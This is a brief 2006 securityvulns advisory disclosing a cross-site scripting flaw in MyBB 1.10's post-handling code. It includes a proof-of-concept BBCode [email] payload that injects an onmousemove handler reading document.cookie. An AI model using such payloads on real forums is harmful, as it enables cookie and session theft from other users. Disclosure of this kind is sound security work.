MyBB 1.10 New CrossSiteScripting

2006-04-04T00:00:00
ID SECURITYVULNS:DOC:12071
Type securityvulns
Reporter Securityvulns
Modified 2006-04-04T00:00:00

Description

MyBB 1.10 CrossSiteScripting

    File :- inc/functions_post.php

BugTraqer :- Devil-00 < stranger-killer@hotmail.com >

we can do attack by some unfilter tags :-

    Post New Thread Or New Replay With This Code :D
    And Try To Move The Mouse Over The Email ;&#41;

    [code]
            [email=a&quot; onmousemove=&quot;alert&#40;document.cookie&#41;;&quot; aaa@aaa.aaa]Click Here![/email]
    [/code]

Palestinian Hacker < Devil-00 | D3vil-0x1 > Visit Palestine Thro www.palestinepnly.com